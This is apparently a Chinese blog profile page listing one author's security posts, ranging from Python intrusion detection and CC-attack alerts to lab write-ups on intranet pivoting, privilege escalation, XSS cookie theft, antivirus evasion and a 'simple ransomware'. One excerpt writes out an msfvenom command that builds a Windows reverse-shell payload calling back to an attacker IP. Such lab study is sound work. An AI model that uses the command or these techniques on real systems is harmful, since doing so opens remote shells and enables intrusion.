自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(28)
  • 收藏
  • 关注

原创 python监视重要文件

【代码】python监视重要文件。

2023-04-16 01:45:00 168

原创 python当作Suricata主动响应脚本

【代码】python当作Suricata主动响应脚本。

2023-04-14 00:15:00 226

原创 python制作类似wazuh预警cc攻击功能

以下目标 利用Python检测CC攻击 (1)用命令获取数量进行预警 (2)使用纯Python处理命令输出结果,不借助于命令 (3)如果出现预警后,利用Python调用防火漆对IP地址进行封锁。 import osimport reimport timefrom collections import Counterdef get_uptime(): cmd = "uptime |awk -F ', ' '{print $5}'" # 获取5分钟的cpu负载 r

2023-04-13 03:00:00 310

原创 python获取http流量并预警

【代码】python获取http流量并预警。

2023-04-13 01:00:00 221

原创 域渗透综合靶场

【代码】域渗透综合靶场。

2023-04-12 12:45:00 719

原创 内网攻击跳板机为Windows

攻击机kali 192.168.114.62 仅可和 192.168.114.63 通信 中间机 192.168.114.63 和 10.10.10.128 windows 2016 server 内网机 10.10.10.129 10.10.10.130 Linux和windos kali生成对应的shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.114.62 LPORT=4444 -f exe > /tmp/s

2023-04-12 01:45:00 131

原创 内网攻击跳板机为Linux

攻击机 Kali 192.168.114.62 跳板机 Linux 192.168.114.84 10.10.10.200 TYPE=EthernetPROXY_METHOD=noneBROWSER_ONLY=noBOOTPROTO=staticDEFROUTE=yesIPV4_FAILURE_FATAL=noIPV6INIT=yesIPV6_AUTOCONF=yesIPV6_DEFROUTE=yesIPV6_FAILURE_FATAL=noIPV6_ADDR_GEN_MODE=s

2023-04-12 00:15:00 231 1

原创 Redis和SSRF不同主机,进行入侵提取

【代码】Redis和SSRF不同主机,进行入侵提取。

2023-04-11 02:00:00 59

原创 BilluBox靶机入侵与提权,和权限维持操作

【代码】BilluBox靶机入侵与提权,和权限维持操作。

2023-04-11 00:30:00 186

原创 Linux Kernel eBPF权限提升漏洞复现

原理 漏洞允许eBPF程序在未经验证的情况下对特定指针进行运算,通过精心构造的代码,可以实现任意内核内存读写,从而进行本地提权 创建新用户开始使用新用户提权 内核修改完成同样需要,环境yum -y install gcc automake autoconf libtool make,还要unzip make CFLAGS=-std=c99 编译不成功 直接找了一个编译成功的,给权限执行完成

2023-04-10 02:30:00 119

原创 python免杀shellcode案例

简单的病毒绕过免杀,完成加壳操作。

2023-04-10 00:15:00 317

原创 Lampiao入侵

对指定环境Lampiao进行尝试入侵提取

2023-04-09 19:14:25 89

原创 XHCMS渗透测试

熊海网站渗透测试这次是黑盒渗透测试

2023-04-01 02:15:00 484

原创 xss获取cookie

主要是借助存储型xss漏洞,来进行攻击的,获取每个访问人的cookie

2023-03-31 13:30:00 899

原创 CSP实时获取报错

使用CSP实时获取,另一个页面的报错信息

2023-03-31 01:45:00 105

原创 文件上传漏洞修复的一些想法使用php完成

针对文件上传漏洞,在使用中思考怎么进行反制,所以写了这些代码进行,尝试进行阻止

2023-03-30 18:00:00 85

原创 VAuditDemo靶场漏洞寻找

针对VAuditDemo经典靶场进行的代码审计和漏洞查找

2023-03-30 15:00:00 1337 1

原创 python对xss扫描器的基础开发

针对xss漏洞进行扫描器开发,实际测试中,xss小游戏靶场可以完成前10关,后面关卡使用字典够的话理论上也可以

2023-03-29 01:00:00 512

原创 python布尔盲注的脚本

使用python,编写一个可以自动爆破的布尔盲注脚本,根据不同情况调整里面的Content-Length的值。

2023-03-28 00:30:00 520

原创 js制作一个监视键盘按键并可以记入日志的功能

这个功能主要是,使用beef时发现的这个功能,于是进行仿造了一个类似的功能,用js方便植入到别人代码中(没有写远程获取的部分)

2023-03-27 04:15:00 129

原创 python简单IDS检测和IPS防御制作

python,制作一个简单ips和ids工具

2023-03-27 01:15:00 363 2

原创 简单制作验证码

制作简单的图片验证码,以session方式进行传递,使用后立刻删除

2023-03-26 11:24:37 62

原创 python制作命令行工具集

借助python将一些常用命令进行,工具集的方式集合,而且可以以命令行运行

2023-03-24 16:58:17 321

原创 利用python制作简单勒索病毒

利用python制作简单的加密勒索病毒,使用base64和ascii进行加密和解密

2023-03-24 12:20:37 1666

原创 python完成注册

借助python和mysql制作一个简单脚本

2023-03-24 12:07:36 309

原创 PHP小型论坛 制作

利用php和html进行一个小型论坛制作,可以回帖,更贴,针对热度和时间进行排序,但缺少安全防护措施

2023-03-24 11:55:35 147

原创 Redis 未授权访问

借助Redis实现免密登录

2023-03-24 11:44:11 73

原创 ensp综合性拓扑简单搭建(web网页)

使用ensp对一个简单拓扑进行复刻,满足远程访问,内网访问外网,VPN专项访问三个要求

2022-11-06 22:39:08 3496

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除